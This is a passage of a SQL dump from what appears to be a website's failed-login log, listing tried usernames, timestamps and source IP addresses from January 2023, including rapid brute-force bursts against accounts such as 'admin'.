02:52:18','20.118.175.32'),(577138,0,'admin','2023-01-25 02:52:18','20.118.175.32'),(577139,0,'marbellavacationhomes','2023-01-25 02:52:18','20.118.175.32'),(577140,0,'admin','2023-01-25 02:52:18','20.118.175.32'),(577141,0,'marbellavacationhomes','2023-01-25 02:52:18','20.118.175.32'),(577142,0,'admin','2023-01-25 02:52:18','20.118.175.32'),(577143,0,'marbellavacationhomes','2023-01-25 02:52:19','20.118.175.32'),(577144,0,'admin','2023-01-25 02:52:19','20.118.175.32'),(577145,0,'marbellavacationhomes','2023-01-25 02:52:19','20.118.175.32'),(577146,0,'admin','2023-01-25 02:52:19','20.118.175.32'),(577147,0,'marbellavacationhomes','2023-01-25 02:52:19','20.118.175.32'),(577148,0,'admin','2023-01-25 02:52:19','20.118.175.32'),(577149,0,'marbellavacationhomes','2023-01-25 02:52:19','20.118.175.32'),(577150,0,'admin','2023-01-25 02:52:19','20.118.175.32'),(577151,0,'marbellavacationhomes','2023-01-25 02:52:20','20.118.175.32'),(577152,0,'admin','2023-01-25 02:52:20','20.118.175.32'),(577153,0,'marbellavacationhomes','2023-01-25 02:52:20','20.118.175.32'),(577154,0,'admin','2023-01-25 02:52:20','20.118.175.32'),(577155,0,'marbellavacationhomes','2023-01-25 02:52:20','20.118.175.32'),(577156,0,'admin','2023-01-25 02:52:20','20.118.175.32'),(577157,0,'marbellavacationhomes','2023-01-25 02:52:20','20.118.175.32'),(577158,0,'admin','2023-01-25 02:52:20','20.118.175.32'),(577159,0,'marbellavacationhomes','2023-01-25 02:52:21','20.118.175.32'),(577160,0,'admin','2023-01-25 02:52:21','20.118.175.32'),(577161,0,'marbellavacationhomes','2023-01-25 02:52:21','20.118.175.32'),(577162,0,'admin','2023-01-25 02:52:21','20.118.175.32'),(577163,0,'marbellavacationhomes','2023-01-25 02:52:21','20.118.175.32'),(577164,0,'admin','2023-01-25 02:52:21','20.118.175.32'),(577165,0,'marbellavacationhomes','2023-01-25 02:52:21','20.118.175.32'),(577166,0,'admin','2023-01-25 02:52:21','20.118.175.32'),(577167,0,'marbellavacationhomes','2023-01-25 02:52:22','20.118.175.32'),(577168,0,'admin','2023-01-25 02:52:22','20.118.175.32'),(577169,0,'marbellavacationhomes','2023-01-25 02:52:22','20.118.175.32'),(577170,0,'admin','2023-01-25 02:52:22','20.118.175.32'),(577171,0,'marbellavacationhomes','2023-01-25 02:52:22','20.118.175.32'),(577172,0,'admin','2023-01-25 02:52:22','20.118.175.32'),(577173,0,'marbellavacationhomes','2023-01-25 02:52:22','20.118.175.32'),(577174,0,'admin','2023-01-25 02:52:22','20.118.175.32'),(577175,0,'marbellavacationhomes','2023-01-25 02:52:23','20.118.175.32'),(577176,0,'admin','2023-01-25 02:52:23','20.118.175.32'),(577177,0,'marbellavacationhomes','2023-01-25 02:52:23','20.118.175.32'),(577178,0,'admin','2023-01-25 02:52:23','20.118.175.32'),(577179,0,'marbellavacationhomes','2023-01-25 02:52:23','20.118.175.32'),(577180,0,'admin','2023-01-25 02:52:23','20.118.175.32'),(577181,0,'marbellavacationhomes','2023-01-25 02:52:23','20.118.175.32'),(577182,0,'admin','2023-01-25 02:52:23','20.118.175.32'),(577183,0,'marbellavacationhomes','2023-01-25 02:52:23','20.118.175.32'),(577184,0,'marbellavacationhomes','2023-01-25 02:52:24','20.118.175.32'),(577185,0,'marbellavacationhomes','2023-01-25 02:52:24','20.118.175.32'),(577186,0,'admin','2023-01-25 02:52:24','20.118.175.32'),(577187,0,'marbellavacationhomes','2023-01-25 02:52:24','20.118.175.32'),(577188,0,'admin','2023-01-25 02:52:24','20.118.175.32'),(577189,0,'marbellavacationhomes','2023-01-25 02:52:24','20.118.175.32'),(577190,0,'admin','2023-01-25 02:52:25','20.118.175.32'),(577191,0,'marbellavacationhomes','2023-01-25 02:52:25','20.118.175.32'),(577192,0,'admin','2023-01-25 02:52:25','20.118.175.32'),(577193,0,'marbellavacationhomes','2023-01-25 02:52:25','20.118.175.32'),(577194,0,'admin','2023-01-25 02:52:25','20.118.175.32'),(577195,0,'marbellavacationhomes','2023-01-25 02:52:25','20.118.175.32'),(577196,0,'admin','2023-01-25 02:52:25','20.118.175.32'),(577197,0,'admin','2023-01-25 02:52:26','20.118.175.32'),(577198,0,'marbellavacationhomes','2023-01-25 02:52:26','20.118.175.32'),(577199,0,'admin','2023-01-25 02:52:26','20.118.175.32'),(577200,0,'admin','2023-01-25 02:52:26','20.118.175.32'),(577201,0,'marbellavacationhomes','2023-01-25 02:52:26','20.118.175.32'),(577202,0,'admin','2023-01-25 02:52:26','20.118.175.32'),(577203,0,'marbellavacationhomes','2023-01-25 02:52:26','20.118.175.32'),(577204,0,'admin','2023-01-25 02:52:27','20.118.175.32'),(577205,0,'marbellavacationhomes','2023-01-25 02:52:27','20.118.175.32'),(577206,0,'admin','2023-01-25 02:52:27','20.118.175.32'),(577207,0,'marbellavacationhomes','2023-01-25 02:52:27','20.118.175.32'),(577208,0,'admin','2023-01-25 02:52:27','20.118.175.32'),(577209,0,'marbellavacationhomes','2023-01-25 02:52:27','20.118.175.32'),(577210,0,'admin','2023-01-25 02:52:27','20.118.175.32'),(577211,0,'marbellavacationhomes','2023-01-25 02:52:27','20.118.175.32'),(577212,0,'admin','2023-01-25 02:52:28','20.118.175.32'),(577213,0,'marbellavacationhomes','2023-01-25 02:52:28','20.118.175.32'),(577214,0,'admin','2023-01-25 02:52:28','20.118.175.32'),(577215,0,'marbellavacationhomes','2023-01-25 02:52:28','20.118.175.32'),(577216,0,'admin','2023-01-25 02:52:28','20.118.175.32'),(577217,0,'marbellavacationhomes','2023-01-25 02:52:28','20.118.175.32'),(577218,0,'admin','2023-01-25 02:52:28','20.118.175.32'),(577219,0,'marbellavacationhomes','2023-01-25 02:52:28','20.118.175.32'),(577220,0,'admin','2023-01-25 02:52:29','20.118.175.32'),(577221,0,'marbellavacationhomes','2023-01-25 02:52:29','20.118.175.32'),(577222,0,'admin','2023-01-25 02:52:29','20.118.175.32'),(577223,0,'marbellavacationhomes','2023-01-25 02:52:29','20.118.175.32'),(577224,0,'admin','2023-01-25 02:52:29','20.118.175.32'),(577225,0,'marbellavacationhomes','2023-01-25 02:52:29','20.118.175.32'),(577226,0,'admin','2023-01-25 02:52:29','20.118.175.32'),(577227,0,'marbellavacationhomes','2023-01-25 02:52:29','20.118.175.32'),(577228,0,'marbellavacationhomes','2023-01-25 02:52:30','20.118.175.32'),(577229,0,'marbellavacationhomes','2023-01-25 02:52:30','20.118.175.32'),(577230,0,'marbellavacationhomes','2023-01-25 02:52:30','20.118.175.32'),(577231,0,'marbellavacationhomes','2023-01-25 02:52:31','20.118.175.32'),(577232,0,'marbellavacationhomes','2023-01-25 02:52:31','20.118.175.32'),(577233,0,'marbellavacationhomes','2023-01-25 02:52:31','20.118.175.32'),(577234,0,'marbellavacationhomes','2023-01-25 02:52:31','20.118.175.32'),(577235,0,'feed','2023-01-25 02:53:18','43.242.214.140'),(577236,0,'admin','2023-01-25 02:58:10','103.129.222.7'),(577237,0,'admin','2023-01-25 03:13:54','34.87.94.148'),(577238,0,'dogstardesign','2023-01-25 03:15:13','51.210.150.127'),(577239,0,'feed','2023-01-25 03:30:53','14.241.233.205'),(577240,0,'feed','2023-01-25 03:49:51','212.192.24.22'),(577241,0,'admin','2023-01-25 03:57:25','69.55.54.119'),(577242,0,'admin','2023-01-25 04:35:05','120.132.99.49'),(577243,0,'admin','2023-01-25 04:48:54','157.230.178.254'),(577244,0,'admin','2023-01-25 04:55:23','185.119.81.102'),(577245,0,'feed','2023-01-25 05:06:51','81.88.53.6'),(577246,0,'dogstardesign','2023-01-25 05:27:39','77.245.149.38'),(577247,0,'admin','2023-01-25 06:22:52','177.55.125.120'),(577248,0,'admin','2023-01-25 06:27:52','5.23.51.54'),(577249,0,'mind','2023-01-25 06:32:09','185.119.81.102'),(577250,0,'admin','2023-01-25 07:32:17','185.78.220.17'),(577251,0,'admin','2023-01-25 07:38:40','178.62.60.116'),(577252,0,'dogstardesign','2023-01-25 07:39:53','137.116.141.77'),(577253,0,'admin','2023-01-25 07:56:30','185.119.81.102'),(577254,0,'admin','2023-01-25 07:56:56','103.74.116.69'),(577255,0,'dogstardesign','2023-01-25 08:11:21','103.74.123.3'),(577256,0,'admin','2023-01-25 08:30:32','47.88.61.91'),(577257,0,'dogstardesign','2023-01-25 10:36:01','95.217.178.185'),(577258,0,'dogstardesign','2023-01-25 10:40:32','177.55.125.120'),(577259,0,'admin','2023-01-25 11:38:39','185.119.81.102'),(577260,0,'dogstardesign','2023-01-25 11:42:02','94.250.250.48'),(577261,0,'admin','2023-01-25 13:26:58','103.18.6.65'),(577262,0,'admin','2023-01-25 13:44:32','103.233.9.73'),(577263,0,'admin','2023-01-25 14:44:35','1.15.139.122'),(577264,0,'admin','2023-01-25 14:48:17','54.36.82.134'),(577265,0,'dogstardesign','2023-01-25 15:47:41','51.89.98.142'),(577266,0,'dogstardesign','2023-01-25 16:14:06','82.200.235.138'),(577267,0,'admin','2023-01-25 16:40:26','1.15.139.122'),(577268,0,'admin','2023-01-25 18:47:25','67.205.132.31'),(577269,0,'admin','2023-01-25 20:16:20','103.28.53.179'),(577270,0,'dogstardesign','2023-01-25 21:06:46','103.233.9.73'),(577271,0,'dogstardesign','2023-01-25 21:13:24','185.78.220.17'),(577272,0,'dogstardesign','2023-01-25 22:28:23','143.244.132.153'),(577273,0,'admin','2023-01-25 22:30:50','185.119.81.102'),(577274,0,'dogstardesign','2023-01-25 23:58:12','172.105.251.128'),(577275,0,'admin','2023-01-26 00:40:34','194.233.81.138'),(577276,0,'dogstardesign','2023-01-26 00:48:12','92.204.128.97'),(577277,0,'dogstardesign','2023-01-26 01:05:26','177.55.125.120'),(577278,0,'dogstardesign','2023-01-26 01:25:44','14.225.255.250'),(577279,0,'admin','2023-01-26 01:34:34','173.236.208.143'),(577280,0,'admin','2023-01-26 03:14:09','185.119.81.102'),(577281,0,'wadminw','2023-01-26 03:35:36','63.135.182.111'),(577282,0,'wwwadmin','2023-01-26 03:58:08','209.145.54.196'),(577283,0,'dogstardesign','2023-01-26 04:41:57','15.235.142.129'),(577284,0,'admin','2023-01-26 05:01:40','45.252.251.22'),(577285,0,'dogstardesign','2023-01-26 05:33:09','185.60.170.226'),(577286,0,'admin','2023-01-26 05:52:21','143.198.226.137'),(577287,0,'admin','2023-01-26 06:44:17','103.146.203.73'),(577288,0,'admin','2023-01-26 07:22:49','45.84.1.94'),(577289,0,'admin','2023-01-26 08:59:35','185.25.117.82'),(577290,0,'admin','2023-01-26 09:13:53','51.144.238.41'),(577291,0,'admin','2023-01-26 09:54:56','103.74.121.5'),(577292,0,'dogst','2023-01-26 10:00:55','185.119.81.102'),(577293,0,'dogstardesign','2023-01-26 10:03:17','34.87.94.148'),(577294,0,'dogstardesign','2023-01-26 11:18:03','46.101.179.205'),(577295,0,'feed','2023-01-26 11:37:54','202.29.236.140'),(577296,0,'feed','2023-01-26 12:18:08','95.97.6.138'),(577297,0,'feed','2023-01-26 12:57:24','121.36.224.178'),(577298,0,'dogstardesign','2023-01-26 13:01:23','206.72.203.35'),(577299,0,'feed','2023-01-26 13:33:33','157.245.70.172'),(577300,0,'feed','2023-01-26 14:18:00','46.182.4.117'),(577301,0,'admin','2023-01-26 14:43:37','185.119.81.102'),(577302,0,'feed','2023-01-26 15:00:53','34.143.243.10'),(577303,0,'dogstardesign','2023-01-26 15:11:43','45.252.251.22'),(577304,0,'feed','2023-01-26 16:37:11','95.217.167.17'),(577305,0,'ardesi','2023-01-26 16:50:39','185.119.81.96'),(577306,0,'dogstardesign','2023-01-26 17:58:05','34.75.221.29'),(577307,0,'feed','2023-01-26 18:37:10','54.37.156.240'),(577308,0,'admin','2023-01-26 19:09:56','174.138.177.173'),(577309,0,'feed','2023-01-26 19:40:36','206.189.129.168'),(577310,0,'admin','2023-01-26 19:41:19','185.119.81.96'),(577311,0,'feed','2023-01-26 20:11:29','139.59.82.122'),(577312,0,'dogstardesign','2023-01-26 20:15:39','103.55.39.107'),(577313,0,'feed','2023-01-26 20:41:27','185.2.5.77'),(577314,0,'admin','2023-01-26 20:58:19','95.217.178.185'),(577315,0,'feed','2023-01-26 21:10:01','202.29.236.140'),(577316,0,'dogstardesign','2023-01-26 21:21:21','192.241.135.47'),(577317,0,'feed','2023-01-26 21:56:52','157.245.55.196'),(577318,0,'feed','2023-01-26 22:13:31','148.72.244.186'),(577319,0,'feed','2023-01-26 22:30:45','39.108.148.88'),(577320,0,'admin','2023-01-26 22:45:12','185.119.81.96'),(577321,0,'feed','2023-01-26 23:12:57','80.88.88.149'),(577322,0,'feed','2023-01-26 23:32:44','139.59.26.209'),(577323,0,'dogstardesign','2023-01-26 23:46:44','148.72.244.186'),(577324,0,'feed','2023-01-26 23:54:54','144.126.157.29'),(577325,0,'feed','2023-01-27 00:44:13','185.2.4.56'),(577326,0,'feed','2023-01-27 01:14:17','45.130.83.61'),(577327,0,'admin','2023-01-27 01:17:29','51.159.35.70'),(577328,0,'feed','2023-01-27 02:14:37','103.130.219.13'),(577329,0,'feed','2023-01-27 02:51:29','171.244.0.91'),(577330,0,'dogst','2023-01-27 03:15:32','185.119.81.102'),(577331,0,'feed','2023-01-27 03:28:52','171.244.0.91'),(577332,0,'feed','2023-01-27 04:07:30','103.130.218.178'),(577333,0,'dogstardesign','2023-01-27 04:45:12','45.252.251.22'),(577334,0,'admin','2023-01-27 04:51:19','167.86.100.73'),(577335,0,'dogstardesign','2023-01-27 06:06:28','103.146.203.123'),(577336,0,'dogst','2023-01-27 06:36:17','185.119.81.102'),(577337,0,'feed','2023-01-27 06:46:02','68.183.86.247'),(577338,0,'admin','2023-01-27 06:55:31','157.245.200.155'),(577339,0,'feed','2023-01-27 07:25:13','188.225.40.227'),(577340,0,'dogstardesign','2023-01-27 07:54:21','95.59.26.9'),(577341,0,'feed','2023-01-27 08:05:30','51.79.144.41'),(577342,0,'feed','2023-01-27 08:49:43','144.126.223.177'),(577343,0,'admin','2023-01-27 09:14:24','103.130.218.42'),(577344,0,'feed','2023-01-27 09:28:32','161.35.52.207'),(577345,0,'admin','2023-01-27 09:48:02','178.208.67.56'),(577346,0,'dogstardesign','2023-01-27 10:08:02','67.227.228.177'),(577347,0,'wadminw','2023-01-27 10:14:47','103.154.177.165'),(577348,0,'wwwadmin','2023-01-27 10:32:32','67.222.131.158'),(577349,0,'dogstardesign','2023-01-27 10:57:47','34.87.94.148'),(577350,0,'dogstardesign','2023-01-27 11:40:20','15.235.142.129'),(577351,0,'feed','2023-01-27 11:51:39','45.130.83.69'),(577352,0,'dogstardesign','2023-01-27 12:01:36','103.153.3.21'),(577353,0,'dogstardesign','2023-01-27 12:04:26','192.241.135.47'),(577354,0,'dogstardesign','2023-01-27 13:27:08','120.46.149.36'),(577355,0,'dogstardesign','2023-01-27 13:55:23','103.129.222.7'),(577356,0,'dogstardesign','2023-01-27 14:16:00','181.119.146.47'),(577357,0,'admin','2023-01-27 15:33:21','47.95.7.118'),(577358,0,'feed','2023-01-27 15:57:17','206.189.17.78'),(577359,0,'dogstardesign','2023-01-27 16:12:32','5.101.157.36'),(577360,0,'admin','2023-01-27 16:16:37','94.250.250.48'),(577361,0,'admin','2023-01-27 16:23:34','45.252.251.22'),(577362,0,'admin','2023-01-27 18:55:05','185.119.81.96'),(577363,0,'admin','2023-01-27 19:12:13','69.55.54.119'),(577364,0,'feed','2023-01-27 19:27:22','68.183.86.247'),(577365,0,'feed','2023-01-27 20:43:17','103.129.222.91'),(577366,0,'ardesi','2023-01-27 20:51:41','185.119.81.96'),(577367,0,'dogstardesign','2023-01-27 22:15:29','37.187.55.231'),(577368,0,'feed','2023-01-27 22:22:52','159.203.143.36'),(577369,0,'dogstardesign','2023-01-27 22:27:12','178.128.31.204'),(577370,0,'dogstardesign','2023-01-27 22:44:15','103.18.6.65'),(577371,0,'feed','2023-01-27 23:31:47','47.105.73.13'),(577372,0,'admin','2023-01-28 00:21:53','185.119.81.108'),(577373,0,'admin','2023-01-28 00:35:42','185.119.81.108'),(577374,0,'feed','2023-01-28 00:42:00','103.130.218.178'),(577375,0,'dogstardesign','2023-01-28 01:05:48','68.183.85.239'),(577376,0,'feed','2023-01-28 01:38:58','148.72.214.194'),(577377,0,'dogstardesign','2023-01-28 01:54:26','103.146.203.73'),(577378,0,'dogstardesign','2023-01-28 02:05:45','34.87.94.148'),(577379,0,'common','2023-01-28 02:31:32','185.119.81.108'),(577380,0,'dogstardesign','2023-01-28 02:36:44','45.252.251.45'),(577381,0,'feed','2023-01-28 02:47:18','81.88.52.78'),(577382,0,'dogstardesign','2023-01-28 02:51:31','51.210.150.127'),(577383,0,'help','2023-01-28 03:18:34','185.119.81.96'),(577384,0,'dogstardesign','2023-01-28 03:28:16','47.88.22.184'),(577385,0,'help','2023-01-28 04:56:00','185.119.81.96'),(577386,0,'help','2023-01-28 05:26:54','185.119.81.96'),(577387,0,'dogstardesign','2023-01-28 05:46:53','47.88.61.91'),(577388,0,'admin','2023-01-28 05:54:56','206.84.102.6'),(577389,0,'wadminw','2023-01-28 06:33:06','154.0.162.187'),(577390,0,'ardesi','2023-01-28 06:39:21','185.119.81.96'),(577391,0,'wwwadmin','2023-01-28 06:54:52','51.91.123.91'),(577392,0,'feed','2023-01-28 07:22:07','64.227.183.25'),(577393,0,'dogstardesign','2023-01-28 08:27:59','167.71.229.255'),(577394,0,'dogstardesign','2023-01-28 09:16:28','167.71.229.255'),(577395,0,'admin','2023-01-28 09:44:36','103.146.203.123'),(577396,0,'dogstardesign','2023-01-28 09:51:36','178.208.67.56'),(577397,0,'admin','2023-01-28 10:27:11','185.119.81.108'),(577398,0,'admin','2023-01-28 11:10:44','150.109.60.184'),(577399,0,'dogstardesign','2023-01-28 12:47:10','91.238.165.67'),(577400,0,'dogstardesign','2023-01-28 13:39:32','206.84.102.6'),(577401,0,'techvisor','2023-01-28 14:00:42','20.118.175.32'),(577402,0,'techvisor','2023-01-28 14:00:42','20.118.175.32'),(577403,0,'alexandrovich','2023-01-28 14:00:42','20.118.175.32'),(577404,0,'techvisor','2023-01-28 14:00:43','20.118.175.32'),(577405,0,'alexandrovich','2023-01-28 14:00:43','20.118.175.32'),(577406,0,'techvisor','2023-01-28 14:00:43','20.118.175.32'),(577407,0,'alexandrovich','2023-01-28 14:00:43','20.118.175.32'),(577408,0,'techvisor','2023-01-28 14:00:43','20.118.175.32'),(577409,0,'alexandrovich','2023-01-28 14:00:43','20.118.175.32'),(577410,0,'techvisor','2023-01-28 14:00:43','20.118.175.32'),(577411,0,'alexandrovich','2023-01-28 14:00:43','20.118.175.32'),(577412,0,'techvisor','2023-01-28 14:00:44','20.118.175.32'),(577413,0,'alexandrovich','2023-01-28 14:00:44','20.118.175.32'),(577414,0,'techvisor','2023-01-28 14:00:44','20.118.175.32'),(577415,0,'alexandrovich','2023-01-28 14:00:44','20.118.175.32'),(577416,0,'techvisor','2023-01-28 14:00:44','20.118.175.32'),(577417,0,'alexandrovich','2023-01-28 14:00:44','20.118.175.32'),(577418,0,'techvisor','2023-01-28 14:00:44','20.118.175.32'),(577419,0,'alexandrovich','2023-01-28 14:00:44','20.118.175.32'),(577420,0,'techvisor','2023-01-28 14:00:45','20.118.175.32'),(577421,0,'alexandrovich','2023-01-28 14:00:45','20.118.175.32'),(577422,0,'techvisor','2023-01-28 14:00:45','20.118.175.32'),(577423,0,'alexandrovich','2023-01-28 14:00:45','20.118.175.32'),(577424,0,'techvisor','2023-01-28 14:00:45','20.118.175.32'),(577425,0,'alexandrovich','2023-01-28 14:00:45','20.118.175.32'),(577426,0,'techvisor','2023-01-28 14:00:45','20.118.175.32'),(577427,0,'alexandrovich','2023-01-28 14:00:46','20.118.175.32'),(577428,0,'techvisor','2023-01-28 14:00:46','20.118.175.32'),(577429,0,'alexandrovich','2023-01-28 14:00:46','20.118.175.32'),(577430,0,'techvisor','2023-01-28 14:00:46','20.118.175.32'),(577431,0,'alexandrovich','2023-01-28 14:00:46','20.118.175.32'),(577432,0,'techvisor','2023-01-28 14:00:46','20.118.175.32'),(577433,0,'alexandrovich','2023-01-28 14:00:46','20.118.175.32'),(577434,0,'techvisor','2023-01-28 14:00:46','20.118.175.32'),(577435,0,'techvisor','2023-01-28 14:00:47','20.118.175.32'),(577436,0,'alexandrovich','2023-01-28 14:00:47','20.118.175.32'),(577437,0,'techvisor','2023-01-28 14:00:47','20.118.175.32'),(577438,0,'alexandrovich','2023-01-28 14:00:47','20.118.175.32'),(577439,0,'techvisor','2023-01-28 14:00:47','20.118.175.32'),(577440,0,'alexandrovich','2023-01-28 14:00:47','20.118.175.32'),(577441,0,'techvisor','2023-01-28 14:00:47','20.118.175.32'),(577442,0,'alexandrovich','2023-01-28 14:00:47','20.118.175.32'),(577443,0,'techvisor','2023-01-28 14:00:48','20.118.175.32'),(577444,0,'alexandrovich','2023-01-28 14:00:48','20.118.175.32'),(577445,0,'techvisor','2023-01-28 14:00:48','20.118.175.32'),(577446,0,'alexandrovich','2023-01-28 14:00:48','20.118.175.32'),(577447,0,'techvisor','2023-01-28 14:00:48','20.118.175.32'),(577448,0,'alexandrovich','2023-01-28 14:00:48','20.118.175.32'),(577449,0,'techvisor','2023-01-28 14:00:48','20.118.175.32'),(577450,0,'alexandrovich','2023-01-28 14:00:48','20.118.175.32'),(577451,0,'techvisor','2023-01-28 14:00:49','20.118.175.32'),(577452,0,'alexandrovich','2023-01-28 14:00:49','20.118.175.32'),(577453,0,'techvisor','2023-01-28 14:00:49','20.118.175.32'),(577454,0,'alexandrovich','2023-01-28 14:00:49','20.118.175.32'),(577455,0,'techvisor','2023-01-28 14:00:49','20.118.175.32'),(577456,0,'alexandrovich','2023-01-28 14:00:49','20.118.175.32'),(577457,0,'techvisor','2023-01-28 14:00:49','20.118.175.32'),(577458,0,'alexandrovich','2023-01-28 14:00:49','20.118.175.32'),(577459,0,'techvisor','2023-01-28 14:00:50','20.118.175.32'),(577460,0,'alexandrovich','2023-01-28 14:00:50','20.118.175.32'),(577461,0,'techvisor','2023-01-28 14:00:50','20.118.175.32'),(577462,0,'alexandrovich','2023-01-28 14:00:50','20.118.175.32'),(577463,0,'techvisor','2023-01-28 14:00:50','20.118.175.32'),(577464,0,'alexandrovich','2023-01-28 14:00:50','20.118.175.32'),(577465,0,'techvisor','2023-01-28 14:00:50','20.118.175.32'),(577466,0,'alexandrovich','2023-01-28 14:00:51','20.118.175.32'),(577467,0,'techvisor','2023-01-28 14:00:51','20.118.175.32'),(577468,0,'alexandrovich','2023-01-28 14:00:51','20.118.175.32'),(577469,0,'techvisor','2023-01-28 14:00:51','20.118.175.32'),(577470,0,'alexandrovich','2023-01-28 14:00:51','20.118.175.32'),(577471,0,'techvisor','2023-01-28 14:00:51','20.118.175.32'),(577472,0,'techvisor','2023-01-28 14:00:51','20.118.175.32'),(577473,0,'alexandrovich','2023-01-28 14:00:51','20.118.175.32'),(577474,0,'alexandrovich','2023-01-28 14:00:52','20.118.175.32'),(577475,0,'techvisor','2023-01-28 14:00:52','20.118.175.32'),(577476,0,'techvisor','2023-01-28 14:00:52','20.118.175.32'),(577477,0,'alexandrovich','2023-01-28 14:00:52','20.118.175.32'),(577478,0,'techvisor','2023-01-28 14:00:52','20.118.175.32'),(577479,0,'alexandrovich','2023-01-28 14:00:52','20.118.175.32'),(577480,0,'techvisor','2023-01-28 14:00:52','20.118.175.32'),(577481,0,'alexandrovich','2023-01-28 14:00:52','20.118.175.32'),(577482,0,'techvisor','2023-01-28 14:00:53','20.118.175.32'),(577483,0,'alexandrovich','2023-01-28 14:00:53','20.118.175.32'),(577484,0,'alexandrovich','2023-01-28 14:00:53','20.118.175.32'),(577485,0,'techvisor','2023-01-28 14:00:53','20.118.175.32'),(577486,0,'alexandrovich','2023-01-28 14:00:53','20.118.175.32'),(577487,0,'techvisor','2023-01-28 14:00:53','20.118.175.32'),(577488,0,'alexandrovich','2023-01-28 14:00:53','20.118.175.32'),(577489,0,'techvisor','2023-01-28 14:00:53','20.118.175.32'),(577490,0,'alexandrovich','2023-01-28 14:00:54','20.118.175.32'),(577491,0,'techvisor','2023-01-28 14:00:54','20.118.175.32'),(577492,0,'alexandrovich','2023-01-28 14:00:54','20.118.175.32'),(577493,0,'techvisor','2023-01-28 14:00:54','20.118.175.32'),(577494,0,'alexandrovich','2023-01-28 14:00:54','20.118.175.32'),(577495,0,'techvisor','2023-01-28 14:00:54','20.118.175.32'),(577496,0,'alexandrovich','2023-01-28 14:00:54','20.118.175.32'),(577497,0,'techvisor','2023-01-28 14:00:54','20.118.175.32'),(577498,0,'techvisor','2023-01-28 14:00:55','20.118.175.32'),(577499,0,'alexandrovich','2023-01-28 14:00:55','20.118.175.32'),(577500,0,'alexandrovich','2023-01-28 14:00:55','20.118.175.32'),(577501,0,'techvisor','2023-01-28 14:00:55','20.118.175.32'),(577502,0,'alexandrovich','2023-01-28 14:00:55','20.118.175.32'),(577503,0,'techvisor','2023-01-28 14:00:55','20.118.175.32'),(577504,0,'alexandrovich','2023-01-28 14:00:55','20.118.175.32'),(577505,0,'techvisor','2023-01-28 14:00:55','20.118.175.32'),(577506,0,'alexandrovich','2023-01-28 14:00:56','20.118.175.32'),(577507,0,'techvisor','2023-01-28 14:00:56','20.118.175.32'),(577508,0,'techvisor','2023-01-28 14:00:56','20.118.175.32'),(577509,0,'alexandrovich','2023-01-28 14:00:56','20.118.175.32'),(577510,0,'techvisor','2023-01-28 14:00:56','20.118.175.32'),(577511,0,'alexandrovich','2023-01-28 14:00:56','20.118.175.32'),(577512,0,'techvisor','2023-01-28 14:00:56','20.118.175.32'),(577513,0,'alexandrovich','2023-01-28 14:00:56','20.118.175.32'),(577514,0,'techvisor','2023-01-28 14:00:57','20.118.175.32'),(577515,0,'alexandrovich','2023-01-28 14:00:57','20.118.175.32'),(577516,0,'techvisor','2023-01-28 14:00:57','20.118.175.32'),(577517,0,'alexandrovich','2023-01-28 14:00:57','20.118.175.32'),(577518,0,'alexandrovich','2023-01-28 14:00:57','20.118.175.32'),(577519,0,'techvisor','2023-01-28 14:00:57','20.118.175.32'),(577520,0,'alexandrovich','2023-01-28 14:00:58','20.118.175.32'),(577521,0,'techvisor','2023-01-28 14:00:58','20.118.175.32'),(577522,0,'techvisor','2023-01-28 14:00:58','20.118.175.32'),(577523,0,'alexandrovich','2023-01-28 14:00:58','20.118.175.32'),(577524,0,'techvisor','2023-01-28 14:00:58','20.118.175.32'),(577525,0,'alexandrovich','2023-01-28 14:00:58','20.118.175.32'),(577526,0,'techvisor','2023-01-28 14:00:58','20.118.175.32'),(577527,0,'alexandrovich','2023-01-28 14:00:58','20.118.175.32'),(577528,0,'alexandrovich','2023-01-28 14:00:59','20.118.175.32'),(577529,0,'techvisor','2023-01-28 14:00:59','20.118.175.32'),(577530,0,'alexandrovich','2023-01-28 14:00:59','20.118.175.32'),(577531,0,'techvisor','2023-01-28 14:00:59','20.118.175.32'),(577532,0,'techvisor','2023-01-28 14:00:59','20.118.175.32'),(577533,0,'alexandrovich','2023-01-28 14:00:59','20.118.175.32'),(577534,0,'techvisor','2023-01-28 14:00:59','20.118.175.32'),(577535,0,'alexandrovich','2023-01-28 14:00:59','20.118.175.32'),(577536,0,'techvisor','2023-01-28 14:01:00','20.118.175.32'),(577537,0,'alexandrovich','2023-01-28 14:01:00','20.118.175.32'),(577538,0,'techvisor','2023-01-28 14:01:00','20.118.175.32'),(577539,0,'alexandrovich','2023-01-28 14:01:00','20.118.175.32'),(577540,0,'alexandrovich','2023-01-28 14:01:00','20.118.175.32'),(577541,0,'techvisor','2023-01-28 14:01:00','20.118.175.32'),(577542,0,'alexandrovich','2023-01-28 14:01:00','20.118.175.32'),(577543,0,'techvisor','2023-01-28 14:01:00','20.118.175.32'),(577544,0,'alexandrovich','2023-01-28 14:01:01','20.118.175.32'),(577545,0,'techvisor','2023-01-28 14:01:01','20.118.175.32'),(577546,0,'alexandrovich','2023-01-28 14:01:01','20.118.175.32'),(577547,0,'techvisor','2023-01-28 14:01:01','20.118.175.32'),(577548,0,'alexandrovich','2023-01-28 14:01:01','20.118.175.32'),(577549,0,'techvisor','2023-01-28 14:01:01','20.118.175.32'),(577550,0,'alexandrovich','2023-01-28 14:01:01','20.118.175.32'),(577551,0,'techvisor','2023-01-28 14:01:01','20.118.175.32'),(577552,0,'alexandrovich','2023-01-28 14:01:01','20.118.175.32'),(577553,0,'techvisor','2023-01-28 14:01:02','20.118.175.32'),(577554,0,'alexandrovich','2023-01-28 14:01:02','20.118.175.32'),(577555,0,'techvisor','2023-01-28 14:01:02','20.118.175.32'),(577556,0,'alexandrovich','2023-01-28 14:01:02','20.118.175.32'),(577557,0,'techvisor','2023-01-28 14:01:02','20.118.175.32'),(577558,0,'alexandrovich','2023-01-28 14:01:02','20.118.175.32'),(577559,0,'techvisor','2023-01-28 14:01:02','20.118.175.32'),(577560,0,'alexandrovich','2023-01-28 14:01:02','20.118.175.32'),(577561,0,'techvisor','2023-01-28 14:01:03','20.118.175.32'),(577562,0,'alexandrovich','2023-01-28 14:01:03','20.118.175.32'),(577563,0,'techvisor','2023-01-28 14:01:03','20.118.175.32'),(577564,0,'alexandrovich','2023-01-28 14:01:03','20.118.175.32'),(577565,0,'techvisor','2023-01-28 14:01:03','20.118.175.32'),(577566,0,'alexandrovich','2023-01-28 14:01:03','20.118.175.32'),(577567,0,'techvisor','2023-01-28 14:01:03','20.118.175.32'),(577568,0,'techvisor','2023-01-28 14:01:04','20.118.175.32'),(577569,0,'alexandrovich','2023-01-28 14:01:04','20.118.175.32'),(577570,0,'techvisor','2023-01-28 14:01:04','20.118.175.32'),(577571,0,'alexandrovich','2023-01-28 